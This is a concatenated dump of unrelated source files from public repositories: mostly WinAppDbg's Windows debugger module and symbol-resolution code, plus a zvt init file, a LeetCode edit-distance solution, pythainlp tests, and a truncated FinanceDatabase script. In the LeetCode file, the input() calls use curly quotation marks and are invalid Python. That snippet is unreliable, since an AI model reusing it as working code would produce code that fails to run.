get_wow64_system_breakpoint, get_wow64_user_breakpoint,
get_wow64_breakin_breakpoint, get_break_on_error_ptr
"""
def __init__(self):
self.__moduleDict = dict()
self.__system_breakpoints = dict()
# Replace split_label with the fuzzy version on object instances.
self.split_label = self.__use_fuzzy_mode
def __initialize_snapshot(self):
"""
Private method to automatically initialize the snapshot
when you try to use it without calling any of the scan_*
methods first. You don't need to call this yourself.
"""
if not self.__moduleDict:
try:
self.scan_modules()
except WindowsError:
pass
def __contains__(self, anObject):
"""
@type anObject: L{Module}, int
@param anObject:
- C{Module}: Module object to look for.
- C{int}: Base address of the DLL to look for.
@rtype: bool
@return: C{True} if the snapshot contains
a L{Module} object with the same base address.
"""
if isinstance(anObject, Module):
anObject = anObject.lpBaseOfDll
return self.has_module(anObject)
def __iter__(self):
"""
@see: L{iter_modules}
@rtype: dictionary-valueiterator
@return: Iterator of L{Module} objects in this snapshot.
"""
return self.iter_modules()
def __len__(self):
"""
@see: L{get_module_count}
@rtype: int
@return: Count of L{Module} objects in this snapshot.
"""
return self.get_module_count()
def has_module(self, lpBaseOfDll):
"""
@type lpBaseOfDll: int
@param lpBaseOfDll: Base address of the DLL to look for.
@rtype: bool
@return: C{True} if the snapshot contains a
L{Module} object with the given base address.
"""
self.__initialize_snapshot()
return lpBaseOfDll in self.__moduleDict
def get_module(self, lpBaseOfDll):
"""
@type lpBaseOfDll: int
@param lpBaseOfDll: Base address of the DLL to look for.
@rtype: L{Module}
@return: Module object with the given base address.
"""
self.__initialize_snapshot()
if lpBaseOfDll not in self.__moduleDict:
msg = "Unknown DLL base address %s"
msg = msg % HexDump.address(lpBaseOfDll)
raise KeyError(msg)
return self.__moduleDict[lpBaseOfDll]
def iter_module_addresses(self):
"""
@see: L{iter_modules}
@rtype: dictionary-keyiterator
@return: Iterator of DLL base addresses in this snapshot.
"""
self.__initialize_snapshot()
return compat.iterkeys(self.__moduleDict)
def iter_modules(self):
"""
@see: L{iter_module_addresses}
@rtype: dictionary-valueiterator
@return: Iterator of L{Module} objects in this snapshot.
"""
self.__initialize_snapshot()
return compat.itervalues(self.__moduleDict)
def get_module_bases(self):
"""
@see: L{iter_module_addresses}
@rtype: list( int... )
@return: List of DLL base addresses in this snapshot.
"""
self.__initialize_snapshot()
return compat.keys(self.__moduleDict)
def get_module_count(self):
"""
@rtype: int
@return: Count of L{Module} objects in this snapshot.
"""
self.__initialize_snapshot()
return len(self.__moduleDict)
#------------------------------------------------------------------------------
def get_module_by_name(self, modName):
"""
@type modName: int
@param modName:
Name of the module to look for, as returned by L{Module.get_name}.
If two or more modules with the same name are loaded, only one
of the matching modules is returned.
You can also pass a full pathname to the DLL file.
This works correctly even if two modules with the same name
are loaded from different paths.
@rtype: L{Module}
@return: C{Module} object that best matches the given name.
Returns C{None} if no C{Module} can be found.
"""
# Convert modName to lowercase.
# This helps make case insensitive string comparisons.
modName = modName.lower()
# modName is an absolute pathname.
if PathOperations.path_is_absolute(modName):
for lib in self.iter_modules():
if modName == lib.get_filename().lower():
return lib
return None # Stop trying to match the name.
# Get all the module names.
# This prevents having to iterate through the module list
# more than once.
modDict = [ ( lib.get_name(), lib ) for lib in self.iter_modules() ]
modDict = dict(modDict)
# modName is a base filename.
if modName in modDict:
return modDict[modName]
# modName is a base filename without extension.
filepart, extpart = PathOperations.split_extension(modName)
if filepart and extpart:
if filepart in modDict:
return modDict[filepart]
# modName is a base address.
try:
baseAddress = HexInput.integer(modName)
except ValueError:
return None
if self.has_module(baseAddress):
return self.get_module(baseAddress)
# Module not found.
return None
def get_module_at_address(self, address):
"""
@type address: int
@param address: Memory address to query.
@rtype: L{Module}
@return: C{Module} object that best matches the given address.
Returns C{None} if no C{Module} can be found.
"""
bases = self.get_module_bases()
bases.sort()
bases.append(long(0x10000000000000000)) # max. 64 bit address + 1
if address >= bases[0]:
i = 0
max_i = len(bases) - 1
while i < max_i:
begin, end = bases[i:i+2]
if begin <= address < end:
module = self.get_module(begin)
here = module.is_address_here(address)
if here is False:
break
else: # True or None
return module
i = i + 1
return None
# XXX this method musn't end up calling __initialize_snapshot by accident!
def scan_modules(self):
"""
Populates the snapshot with loaded modules.
"""
# The module filenames may be spoofed by malware,
# since this information resides in usermode space.
# See: http://www.ragestorm.net/blogs/?p=163
# Ignore special process IDs.
# PID 0: System Idle Process. Also has a special meaning to the
# toolhelp APIs (current process).
# PID 4: System Integrity Group. See this forum post for more info:
# http://tinyurl.com/ycza8jo
# (points to social.technet.microsoft.com)
# Only on XP and above
# PID 8: System (?) only in Windows 2000 and below AFAIK.
# It's probably the same as PID 4 in XP and above.
dwProcessId = self.get_pid()
if dwProcessId in (0, 4, 8):
return
# It would seem easier to clear the snapshot first.
# But then all open handles would be closed.
found_bases = set()
with win32.CreateToolhelp32Snapshot(win32.TH32CS_SNAPMODULE,
dwProcessId) as hSnapshot:
me = win32.Module32First(hSnapshot)
while me is not None:
lpBaseAddress = me.modBaseAddr
fileName = me.szExePath # full pathname
if not fileName:
fileName = me.szModule # filename only
if not fileName:
fileName = None
else:
fileName = PathOperations.native_to_win32_pathname(fileName)
found_bases.add(lpBaseAddress)
## if not self.has_module(lpBaseAddress): # XXX triggers a scan
if lpBaseAddress not in self.__moduleDict:
aModule = Module(lpBaseAddress, fileName = fileName,
SizeOfImage = me.modBaseSize,
process = self)
self._add_module(aModule)
else:
aModule = self.get_module(lpBaseAddress)
if not aModule.fileName:
aModule.fileName = fileName
if not aModule.SizeOfImage:
aModule.SizeOfImage = me.modBaseSize
if not aModule.process:
aModule.process = self
me = win32.Module32Next(hSnapshot)
## for base in self.get_module_bases(): # XXX triggers a scan
for base in compat.keys(self.__moduleDict):
if base not in found_bases:
self._del_module(base)
def clear_modules(self):
"""
Clears the modules snapshot.
"""
for aModule in compat.itervalues(self.__moduleDict):
aModule.clear()
self.__moduleDict = dict()
#------------------------------------------------------------------------------
@staticmethod
def parse_label(module = None, function = None, offset = None):
"""
Creates a label from a module and a function name, plus an offset.
@warning: This method only creates the label, it doesn't make sure the
label actually points to a valid memory location.
@type module: None or str
@param module: (Optional) Module name.
@type function: None, str or int
@param function: (Optional) Function name or ordinal.
@type offset: None or int
@param offset: (Optional) Offset value.
If C{function} is specified, offset from the function.
If C{function} is C{None}, offset from the module.
@rtype: str
@return:
Label representing the given function in the given module.
@raise ValueError:
The module or function name contain invalid characters.
"""
# TODO
# Invalid characters should be escaped or filtered.
# Convert ordinals to strings.
try:
function = "#0x%x" % function
except TypeError:
pass
# Validate the parameters.
if module is not None and ('!' in module or '+' in module):
raise ValueError("Invalid module name: %s" % module)
if function is not None and ('!' in function or '+' in function):
raise ValueError("Invalid function name: %s" % function)
# Parse the label.
if module:
if function:
if offset:
label = "%s!%s+0x%x" % (module, function, offset)
else:
label = "%s!%s" % (module, function)
else:
if offset:
## label = "%s+0x%x!" % (module, offset)
label = "%s!0x%x" % (module, offset)
else:
label = "%s!" % module
else:
if function:
if offset:
label = "!%s+0x%x" % (function, offset)
else:
label = "!%s" % function
else:
if offset:
label = "0x%x" % offset
else:
label = "0x0"
return label
@staticmethod
def split_label_strict(label):
"""
Splits a label created with L{parse_label}.
To parse labels with a less strict syntax, use the L{split_label_fuzzy}
method instead.
@warning: This method only parses the label, it doesn't make sure the
label actually points to a valid memory location.
@type label: str
@param label: Label to split.
@rtype: tuple( str or None, str or int or None, int or None )
@return: Tuple containing the C{module} name,
the C{function} name or ordinal, and the C{offset} value.
If the label doesn't specify a module,
then C{module} is C{None}.
If the label doesn't specify a function,
then C{function} is C{None}.
If the label doesn't specify an offset,
then C{offset} is C{0}.
@raise ValueError: The label is malformed.
"""
module = function = None
offset = 0
# Special case: None
if not label:
label = "0x0"
else:
# Remove all blanks.
label = label.replace(' ', '')
label = label.replace('\t', '')
label = label.replace('\r', '')
label = label.replace('\n', '')
# Special case: empty label.
if not label:
label = "0x0"
# * ! *
if '!' in label:
try:
module, function = label.split('!')
except ValueError:
raise ValueError("Malformed label: %s" % label)
# module ! function
if function:
if '+' in module:
raise ValueError("Malformed label: %s" % label)
# module ! function + offset
if '+' in function:
try:
function, offset = function.split('+')
except ValueError:
raise ValueError("Malformed label: %s" % label)
try:
offset = HexInput.integer(offset)
except ValueError:
raise ValueError("Malformed label: %s" % label)
else:
# module ! offset
try:
offset = HexInput.integer(function)
function = None
except ValueError:
pass
else:
# module + offset !
if '+' in module:
try:
module, offset = module.split('+')
except ValueError:
raise ValueError("Malformed label: %s" % label)
try:
offset = HexInput.integer(offset)
except ValueError:
raise ValueError("Malformed label: %s" % label)
else:
# module !
try:
offset = HexInput.integer(module)
module = None
# offset !
except ValueError:
pass
if not module:
module = None
if not function:
function = None
# *
else:
# offset
try:
offset = HexInput.integer(label)
# # ordinal
except ValueError:
if label.startswith('#'):
function = label
try:
HexInput.integer(function[1:])
# module?
# function?
except ValueError:
raise ValueError("Ambiguous label: %s" % label)
# module?
# function?
else:
raise ValueError("Ambiguous label: %s" % label)
# Convert function ordinal strings into integers.
if function and function.startswith('#'):
try:
function = HexInput.integer(function[1:])
except ValueError:
pass
# Convert null offsets to None.
if not offset:
offset = None
return (module, function, offset)
def split_label_fuzzy(self, label):
"""
Splits a label entered as user input.
It's more flexible in it's syntax parsing than the L{split_label_strict}
method, as it allows the exclamation mark (B{C{!}}) to be omitted. The
ambiguity is resolved by searching the modules in the snapshot to guess
if a label refers to a module or a function. It also tries to rebuild
labels when they contain hardcoded addresses.
@warning: This method only parses the label, it doesn't make sure the
label actually points to a valid memory location.
@type label: str
@param label: Label to split.
@rtype: tuple( str or None, str or int or None, int or None )
@return: Tuple containing the C{module} name,
the C{function} name or ordinal, and the C{offset} value.
If the label doesn't specify a module,
then C{module} is C{None}.
If the label doesn't specify a function,
then C{function} is C{None}.
If the label doesn't specify an offset,
then C{offset} is C{0}.
@raise ValueError: The label is malformed.
"""
module = function = None
offset = 0
# Special case: None
if not label:
label = compat.b("0x0")
else:
# Remove all blanks.
label = label.replace(compat.b(' '), compat.b(''))
label = label.replace(compat.b('\t'), compat.b(''))
label = label.replace(compat.b('\r'), compat.b(''))
label = label.replace(compat.b('\n'), compat.b(''))
# Special case: empty label.
if not label:
label = compat.b("0x0")
# If an exclamation sign is present, we know we can parse it strictly.
if compat.b('!') in label:
return self.split_label_strict(label)
## # Try to parse it strictly, on error do it the fuzzy way.
## try:
## return self.split_label(label)
## except ValueError:
## pass
# * + offset
if compat.b('+') in label:
try:
prefix, offset = label.split(compat.b('+'))
except ValueError:
raise ValueError("Malformed label: %s" % label)
try:
offset = HexInput.integer(offset)
except ValueError:
raise ValueError("Malformed label: %s" % label)
label = prefix
# This parses both filenames and base addresses.
modobj = self.get_module_by_name(label)
if modobj:
# module
# module + offset
module = modobj.get_name()
else:
# TODO
# If 0xAAAAAAAA + 0xBBBBBBBB is given,
# A is interpreted as a module base address,
# and B as an offset.
# If that fails, it'd be good to add A+B and try to
# use the nearest loaded module.
# offset
# base address + offset (when no module has that base address)
try:
address = HexInput.integer(label)
if offset:
# If 0xAAAAAAAA + 0xBBBBBBBB is given,
# A is interpreted as a module base address,
# and B as an offset.
# If that fails, we get here, meaning no module was found
# at A. Then add up A+B and work with that as a hardcoded
# address.
offset = address + offset
else:
# If the label is a hardcoded address, we get here.
offset = address
# If only a hardcoded address is given,
# rebuild the label using get_label_at_address.
# Then parse it again, but this time strictly,
# both because there is no need for fuzzy syntax and
# to prevent an infinite recursion if there's a bug here.
try:
new_label = self.get_label_at_address(offset)
module, function, offset = \
self.split_label_strict(new_label)
except ValueError:
pass
# function
# function + offset
except ValueError:
function = label
# Convert function ordinal strings into integers.
if function and function.startswith(compat.b('#')):
try:
function = HexInput.integer(function[1:])
except ValueError:
pass
# Convert null offsets to None.
if not offset:
offset = None
return (module, function, offset)
@classmethod
def split_label(cls, label):
"""
Splits a label into it's C{module}, C{function} and C{offset}
components, as used in L{parse_label}.
When called as a static method, the strict syntax mode is used::
winappdbg.Process.split_label( "kernel32!CreateFileA" )
When called as an instance method, the fuzzy syntax mode is used::
aProcessInstance.split_label( "CreateFileA" )
@see: L{split_label_strict}, L{split_label_fuzzy}
@type label: str
@param label: Label to split.
@rtype: tuple( str or None, str or int or None, int or None )
@return:
Tuple containing the C{module} name,
the C{function} name or ordinal, and the C{offset} value.
If the label doesn't specify a module,
then C{module} is C{None}.
If the label doesn't specify a function,
then C{function} is C{None}.
If the label doesn't specify an offset,
then C{offset} is C{0}.
@raise ValueError: The label is malformed.
"""
# XXX
# Docstring indentation was removed so epydoc doesn't complain
# when parsing the docs for __use_fuzzy_mode().
# This function is overwritten by __init__
# so here is the static implementation only.
return cls.split_label_strict(label)
# The split_label method is replaced with this function by __init__.
def __use_fuzzy_mode(self, label):
"@see: L{split_label}"
return self.split_label_fuzzy(label)
## __use_fuzzy_mode.__doc__ = split_label.__doc__
def sanitize_label(self, label):
"""
Converts a label taken from user input into a well-formed label.
@type label: str
@param label: Label taken from user input.
@rtype: str
@return: Sanitized label.
"""
(module, function, offset) = self.split_label_fuzzy(label)
label = self.parse_label(module, function, offset)
return label
def resolve_label(self, label):
"""
Resolve the memory address of the given label.
@note:
If multiple modules with the same name are loaded,
the label may be resolved at any of them. For a more precise
way to resolve functions use the base address to get the L{Module}
object (see L{Process.get_module}) and then call L{Module.resolve}.
If no module name is specified in the label, the function may be
resolved in any loaded module. If you want to resolve all functions
with that name in all processes, call L{Process.iter_modules} to
iterate through all loaded modules, and then try to resolve the
function in each one of them using L{Module.resolve}.
@type label: str
@param label: Label to resolve.
@rtype: int
@return: Memory address pointed to by the label.
@raise ValueError: The label is malformed or impossible to resolve.
@raise RuntimeError: Cannot resolve the module or function.
"""
# Split the label into module, function and offset components.
module, function, offset = self.split_label_fuzzy(label)
# Resolve the components into a memory address.
address = self.resolve_label_components(module, function, offset)
# Return the memory address.
return address
def resolve_label_components(self, module = None,
function = None,
offset = None):
"""
Resolve the memory address of the given module, function and/or offset.
@note:
If multiple modules with the same name are loaded,
the label may be resolved at any of them. For a more precise
way to resolve functions use the base address to get the L{Module}
object (see L{Process.get_module}) and then call L{Module.resolve}.
If no module name is specified in the label, the function may be
resolved in any loaded module. If you want to resolve all functions
with that name in all processes, call L{Process.iter_modules} to
iterate through all loaded modules, and then try to resolve the
function in each one of them using L{Module.resolve}.
@type module: None or str
@param module: (Optional) Module name.
@type function: None, str or int
@param function: (Optional) Function name or ordinal.
@type offset: None or int
@param offset: (Optional) Offset value.
If C{function} is specified, offset from the function.
If C{function} is C{None}, offset from the module.
@rtype: int
@return: Memory address pointed to by the label.
@raise ValueError: The label is malformed or impossible to resolve.
@raise RuntimeError: Cannot resolve the module or function.
"""
# Default address if no module or function are given.
# An offset may be added later.
address = 0
# Resolve the module.
# If the module is not found, check for the special symbol "main".
if module:
modobj = self.get_module_by_name(module)
if not modobj:
if module == "main":
modobj = self.get_main_module()
else:
raise RuntimeError("Module %r not found" % module)
# Resolve the exported function or debugging symbol.
# If all else fails, check for the special symbol "start".
if function:
address = modobj.resolve(function)
if address is None:
address = modobj.resolve_symbol(function)
if address is None:
if function == "start":
address = modobj.get_entry_point()
if address is None:
msg = "Symbol %r not found in module %s"
raise RuntimeError(msg % (function, module))
# No function, use the base address.
else:
address = modobj.get_base()
# Resolve the function in any module.
# If all else fails, check for the special symbols "main" and "start".
elif function:
for modobj in self.iter_modules():
address = modobj.resolve(function)
if address is not None:
break
if address is None:
if function == "start":
modobj = self.get_main_module()
address = modobj.get_entry_point()
elif function == "main":
modobj = self.get_main_module()
address = modobj.get_base()
else:
msg = "Function %r not found in any module" % function
raise RuntimeError(msg)
# Return the address plus the offset.
if offset:
address = address + offset
return address
def get_label_at_address(self, address, offset = None):
"""
Creates a label from the given memory address.
@warning: This method uses the name of the nearest currently loaded
module. If that module is unloaded later, the label becomes
impossible to resolve.
@type address: int
@param address: Memory address.
@type offset: None or int
@param offset: (Optional) Offset value.
@rtype: str
@return: Label pointing to the given address.
"""
if offset:
address = address + offset
modobj = self.get_module_at_address(address)
if modobj:
label = modobj.get_label_at_address(address)
else:
label = self.parse_label(None, None, address)
return label
#------------------------------------------------------------------------------
# The memory addresses of system breakpoints are be cached, since they're
# all in system libraries it's not likely they'll ever change their address
# during the lifetime of the process... I don't suppose a program could
# happily unload ntdll.dll and survive.
def __get_system_breakpoint(self, label):
try:
return self.__system_breakpoints[label]
except KeyError:
try:
address = self.resolve_label(label)
except Exception:
return None
self.__system_breakpoints[label] = address
return address
# It's in kernel32 in Windows Server 2003, in ntdll since Windows Vista.
# It can only be resolved if we have the debug symbols.
def get_break_on_error_ptr(self):
"""
@rtype: int
@return:
If present, returns the address of the C{g_dwLastErrorToBreakOn}
global variable for this process. If not, returns C{None}.
"""
address = self.__get_system_breakpoint("ntdll!g_dwLastErrorToBreakOn")
if not address:
address = self.__get_system_breakpoint(
"kernel32!g_dwLastErrorToBreakOn")
# cheat a little :)
self.__system_breakpoints["ntdll!g_dwLastErrorToBreakOn"] = address
return address
def is_system_defined_breakpoint(self, address):
"""
@type address: int
@param address: Memory address.
@rtype: bool
@return: C{True} if the given address points to a system defined
breakpoint. System defined breakpoints are hardcoded into
system libraries.
"""
if address:
module = self.get_module_at_address(address)
if module:
return module.match_name("ntdll") or \
module.match_name("kernel32")
return False
# FIXME
# In Wine, the system breakpoint seems to be somewhere in kernel32.
def get_system_breakpoint(self):
"""
@rtype: int or None
@return: Memory address of the system breakpoint
within the process address space.
Returns C{None} on error.
"""
return self.__get_system_breakpoint("ntdll!DbgBreakPoint")
# I don't know when this breakpoint is actually used...
def get_user_breakpoint(self):
"""
@rtype: int or None
@return: Memory address of the user breakpoint
within the process address space.
Returns C{None} on error.
"""
return self.__get_system_breakpoint("ntdll!DbgUserBreakPoint")
# On some platforms, this breakpoint can only be resolved
# when the debugging symbols for ntdll.dll are loaded.
def get_breakin_breakpoint(self):
"""
@rtype: int or None
@return: Memory address of the remote breakin breakpoint
within the process address space.
Returns C{None} on error.
"""
return self.__get_system_breakpoint("ntdll!DbgUiRemoteBreakin")
# Equivalent of ntdll!DbgBreakPoint in Wow64.
def get_wow64_system_breakpoint(self):
"""
@rtype: int or None
@return: Memory address of the Wow64 system breakpoint
within the process address space.
Returns C{None} on error.
"""
return self.__get_system_breakpoint("ntdll32!DbgBreakPoint")
# Equivalent of ntdll!DbgUserBreakPoint in Wow64.
def get_wow64_user_breakpoint(self):
"""
@rtype: int or None
@return: Memory address of the Wow64 user breakpoint
within the process address space.
Returns C{None} on error.
"""
return self.__get_system_breakpoint("ntdll32!DbgUserBreakPoint")
# Equivalent of ntdll!DbgUiRemoteBreakin in Wow64.
def get_wow64_breakin_breakpoint(self):
"""
@rtype: int or None
@return: Memory address of the Wow64 remote breakin breakpoint
within the process address space.
Returns C{None} on error.
"""
return self.__get_system_breakpoint("ntdll32!DbgUiRemoteBreakin")
#------------------------------------------------------------------------------
def load_symbols(self):
"""
Loads the debugging symbols for all modules in this snapshot.
Automatically called by L{get_symbols}.
"""
for aModule in self.iter_modules():
aModule.load_symbols()
def unload_symbols(self):
"""
Unloads the debugging symbols for all modules in this snapshot.
"""
for aModule in self.iter_modules():
aModule.unload_symbols()
def get_symbols(self):
"""
Returns the debugging symbols for all modules in this snapshot.
The symbols are automatically loaded when needed.
@rtype: list of tuple( str, int, int )
@return: List of symbols.
Each symbol is represented by a tuple that contains:
- Symbol name
- Symbol memory address
- Symbol size in bytes
"""
symbols = list()
for aModule in self.iter_modules():
for symbol in aModule.iter_symbols():
symbols.append(symbol)
return symbols
def iter_symbols(self):
"""
Returns an iterator for the debugging symbols in all modules in this
snapshot, in no particular order.
The symbols are automatically loaded when needed.
@rtype: iterator of tuple( str, int, int )
@return: Iterator of symbols.
Each symbol is represented by a tuple that contains:
- Symbol name
- Symbol memory address
- Symbol size in bytes
"""
for aModule in self.iter_modules():
for symbol in aModule.iter_symbols():
yield symbol
def resolve_symbol(self, symbol, bCaseSensitive = False):
"""
Resolves a debugging symbol's address.
@type symbol: str
@param symbol: Name of the symbol to resolve.
@type bCaseSensitive: bool
@param bCaseSensitive: C{True} for case sensitive matches,
C{False} for case insensitive.
@rtype: int or None
@return: Memory address of symbol. C{None} if not found.
"""
if bCaseSensitive:
for (SymbolName, SymbolAddress, SymbolSize) in self.iter_symbols():
if symbol == SymbolName:
return SymbolAddress
else:
symbol = symbol.lower()
for (SymbolName, SymbolAddress, SymbolSize) in self.iter_symbols():
if symbol == SymbolName.lower():
return SymbolAddress
def get_symbol_at_address(self, address):
"""
Tries to find the closest matching symbol for the given address.
@type address: int
@param address: Memory address to query.
@rtype: None or tuple( str, int, int )
@return: Returns a tuple consisting of:
- Name
- Address
- Size (in bytes)
Returns C{None} if no symbol could be matched.
"""
# Any module may have symbols pointing anywhere in memory, so there's
# no easy way to optimize this. I guess we're stuck with brute force.
found = None
for (SymbolName, SymbolAddress, SymbolSize) in self.iter_symbols():
if SymbolAddress > address:
continue
if SymbolAddress == address:
found = (SymbolName, SymbolAddress, SymbolSize)
break
if SymbolAddress < address:
if found and (address - found[1]) < (address - SymbolAddress):
continue
else:
found = (SymbolName, SymbolAddress, SymbolSize)
return found
#------------------------------------------------------------------------------
# XXX _notify_* methods should not trigger a scan
def _add_module(self, aModule):
"""
Private method to add a module object to the snapshot.
@type aModule: L{Module}
@param aModule: Module object.
"""
## if not isinstance(aModule, Module):
## if hasattr(aModule, '__class__'):
## typename = aModule.__class__.__name__
## else:
## typename = str(type(aModule))
## msg = "Expected Module, got %s instead" % typename
## raise TypeError(msg)
lpBaseOfDll = aModule.get_base()
## if lpBaseOfDll in self.__moduleDict:
## msg = "Module already exists: %d" % lpBaseOfDll
## raise KeyError(msg)
aModule.set_process(self)
self.__moduleDict[lpBaseOfDll] = aModule
def _del_module(self, lpBaseOfDll):
"""
Private method to remove a module object from the snapshot.
@type lpBaseOfDll: int
@param lpBaseOfDll: Module base address.
"""
try:
aModule = self.__moduleDict[lpBaseOfDll]
del self.__moduleDict[lpBaseOfDll]
except KeyError:
aModule = None
msg = "Unknown base address %d" % HexDump.address(lpBaseOfDll)
warnings.warn(msg, RuntimeWarning)
if aModule:
aModule.clear() # remove circular references
def __add_loaded_module(self, event):
"""
Private method to automatically add new module objects from debug events.
@type event: L{Event}
@param event: Event object.
"""
lpBaseOfDll = event.get_module_base()
hFile = event.get_file_handle()
## if not self.has_module(lpBaseOfDll): # XXX this would trigger a scan
if lpBaseOfDll not in self.__moduleDict:
fileName = event.get_filename()
if not fileName:
fileName = None
if hasattr(event, 'get_start_address'):
EntryPoint = event.get_start_address()
else:
EntryPoint = None
aModule = Module(lpBaseOfDll, hFile, fileName = fileName,
EntryPoint = EntryPoint,
process = self)
self._add_module(aModule)
else:
aModule = self.get_module(lpBaseOfDll)
if not aModule.hFile and hFile not in (None, 0,
win32.INVALID_HANDLE_VALUE):
aModule.hFile = hFile
if not aModule.process:
aModule.process = self
if aModule.EntryPoint is None and \
hasattr(event, 'get_start_address'):
aModule.EntryPoint = event.get_start_address()
if not aModule.fileName:
fileName = event.get_filename()
if fileName:
aModule.fileName = fileName
def _notify_create_process(self, event):
"""
Notify the load of the main module.
This is done automatically by the L{Debug} class, you shouldn't need
to call it yourself.
@type event: L{CreateProcessEvent}
@param event: Create process event.
@rtype: bool
@return: C{True} to call the user-defined handle, C{False} otherwise.
"""
self.__add_loaded_module(event)
return True
def _notify_load_dll(self, event):
"""
Notify the load of a new module.
This is done automatically by the L{Debug} class, you shouldn't need
to call it yourself.
@type event: L{LoadDLLEvent}
@param event: Load DLL event.
@rtype: bool
@return: C{True} to call the user-defined handle, C{False} otherwise.
"""
self.__add_loaded_module(event)
return True
def _notify_unload_dll(self, event):
"""
Notify the release of a loaded module.
This is done automatically by the L{Debug} class, you shouldn't need
to call it yourself.
@type event: L{UnloadDLLEvent}
@param event: Unload DLL event.
@rtype: bool
@return: C{True} to call the user-defined handle, C{False} otherwise.
"""
lpBaseOfDll = event.get_module_base()
## if self.has_module(lpBaseOfDll): # XXX this would trigger a scan
if lpBaseOfDll in self.__moduleDict:
self._del_module(lpBaseOfDll)
return True
|
src/zvt/factors/ma/domain/__init__.py | vishalbelsare/zvt | 2,032 | 11195093 | <reponame>vishalbelsare/zvt
# -*- coding: utf-8 -*-
# the __all__ is generated
__all__ = []
# __init__.py structure:
# common code of the package
# export interface in __all__ which contains __all__ of its sub modules
# import all from submodule stock_1d_ma_stats_factor
from .stock_1d_ma_stats_factor import *
from .stock_1d_ma_stats_factor import __all__ as _stock_1d_ma_stats_factor_all
__all__ += _stock_1d_ma_stats_factor_all
# import all from submodule stock_1d_ma_factor
from .stock_1d_ma_factor import *
from .stock_1d_ma_factor import __all__ as _stock_1d_ma_factor_all
__all__ += _stock_1d_ma_factor_all
# import all from submodule common
from .common import *
from .common import __all__ as _common_all
__all__ += _common_all
|
LeetCode/0072_Edit_Distance.py | Achyut-sudo/PythonAlgorithms | 144 | 11195109 | <reponame>Achyut-sudo/PythonAlgorithms
class Solution:
# @return an integer
def minDistance(self, word1, word2):
m=len(word1)
n=len(word2)
dp=[[0 for i in range(n+1)] for j in range(m+1)]
for i in range(m+1):
dp[i][0]=i
for j in range(n+1):
dp[0][j]=j
for i in range(1,m+1):
for j in range(1,n+1):
if word1[i-1]==word2[j-1]:
dp[i][j]=dp[i-1][j-1]
else:
dp[i][j]=min(dp[i-1][j]+1,dp[i][j-1]+1,dp[i-1][j-1]+1)
return dp[m][n]
test=Solution()
input1=str(input(“Enter a string1”))
input2=str(input(“Enter a string2”))
print(test.minDistance(input1,input2))
|
tests/test_word_vector.py | Gorlph/pythainlp | 569 | 11195124 | # -*- coding: utf-8 -*-
import unittest
from pythainlp import word_vector
from pythainlp.word_vector import WordVector
class TestWordVectorPackage(unittest.TestCase):
def test_thai2vec(self):
self.assertGreaterEqual(word_vector.similarity("แบคทีเรีย", "คน"), 0)
self.assertIsNotNone(word_vector.sentence_vectorizer(""))
self.assertIsNotNone(word_vector.get_model())
self.assertIsNotNone(
word_vector.sentence_vectorizer("เสรีภาพในการชุมนุม")
)
self.assertIsNotNone(
word_vector.sentence_vectorizer(
"เสรีภาพในการรวมตัว\nสมาคม", use_mean=True
)
)
self.assertIsNotNone(
word_vector.sentence_vectorizer("I คิด therefore I am ผ็ฎ์")
)
self.assertIsNotNone(
word_vector.most_similar_cosmul(
["สหรัฐอเมริกา", "ประธานาธิบดี"], ["ประเทศไทย"]
)[0][0]
)
self.assertEqual(
word_vector.doesnt_match(["ญี่ปุ่น", "พม่า", "ไอติม"]), "ไอติม"
)
_wv = WordVector("thai2fit_wv")
self.assertGreaterEqual(
_wv.similarity("แบคทีเรีย", "คน"), 0
)
self.assertIsNotNone(_wv.sentence_vectorizer(""))
self.assertIsNotNone(_wv.get_model())
self.assertIsNotNone(
_wv.sentence_vectorizer("เสรีภาพในการชุมนุม")
)
self.assertIsNotNone(
_wv.sentence_vectorizer(
"เสรีภาพในการรวมตัว\nสมาคม", use_mean=True
)
)
self.assertIsNotNone(
_wv.sentence_vectorizer("I คิด therefore I am ผ็ฎ์")
)
self.assertIsNotNone(
_wv.most_similar_cosmul(
["สหรัฐอเมริกา", "ประธานาธิบดี"], ["ประเทศไทย"]
)[0][0]
)
self.assertEqual(
_wv.doesnt_match(["ญี่ปุ่น", "พม่า", "ไอติม"]), "ไอติม"
)
def test_ltw2v(self):
_wv = WordVector("ltw2v")
self.assertGreaterEqual(
_wv.similarity("แบคทีเรีย", "คน"), 0
)
self.assertIsNotNone(_wv.sentence_vectorizer(""))
self.assertIsNotNone(_wv.get_model())
self.assertIsNotNone(
_wv.sentence_vectorizer("เสรีภาพในการชุมนุม")
)
self.assertIsNotNone(
_wv.sentence_vectorizer(
"เสรีภาพในการรวมตัว\nสมาคม", use_mean=True
)
)
self.assertIsNotNone(
_wv.sentence_vectorizer("I คิด therefore I am ผ็ฎ์")
)
self.assertIsNotNone(
_wv.most_similar_cosmul(
["สหรัฐอเมริกา", "ประธานาธิบดี"], ["ไทย"]
)[0][0]
)
self.assertEqual(
_wv.doesnt_match(["ญี่ปุ่น", "พม่า", "ไอติม"]), "ไอติม"
)
|
linmdtw/_version.py | lvlanson/linmdtw | 180 | 11195140 | __version__ = "0.1.6"
|
Methodology/C_CreateDatabase/moneymarkets_creator.py | MobileAir/FinanceDatabase | 1,014 | 11195151 | import json
import os
from tqdm import tqdm
def fill_data_points_moneymarkets(data_symbol, options=None):
if options is None:
options = {}
try:
options['short_name'] = data_symbol['quoteType']['shortName']
except (TypeError, KeyError):
options['short_name'] = None
try:
options['long_name'] = data_symbol['quoteType']['longName']
except (TypeError, KeyError):
options['long_name'] = None
try:
options['currency'] = data_symbol['price']['currency']
except (TypeError, KeyError):
options['currency'] = None
try:
options['market'] = data_symbol['quoteType']['market']
except (TypeError, KeyError):
options['market'] = None
try:
options['exchange'] = data_symbol['quoteType']['exchange']
except (TypeError, KeyError):
options['exchange'] = None
return options
def make_directories_and_fill_json_moneymarkets(data, directory_name):
try:
market_dictionaries = {}
symbols_dictionaries = {}
Errors = {}
os.mkdir(directory_name)
except FileExistsError:
return print(directory_name + " already exists. Please delete or rename the directory "
"before continuing")
print("Creating folder structure")
for symbol in tqdm(data):
options = fill_data_points_moneymarkets(data[symbol])
symbols_dictionaries[symbol] = options
try:
market = data[symbol]['quoteType']['market']
if market not in market_dictionaries and market is not None:
if len(market) > 0:
market_dictionaries[market] = {}
market_dictionaries[market][symbol] = options
except (TypeError, KeyError) as e:
Errors[symbol + ' Category'] = "Could not be categorized due to: " + str(e)
print('Filling folders with data..')
for market in tqdm(market_dictionaries.keys()):
market_new = market.replace('/', ' ')
with open(directory_name + '/' + market_new + '.json', 'w') as handle:
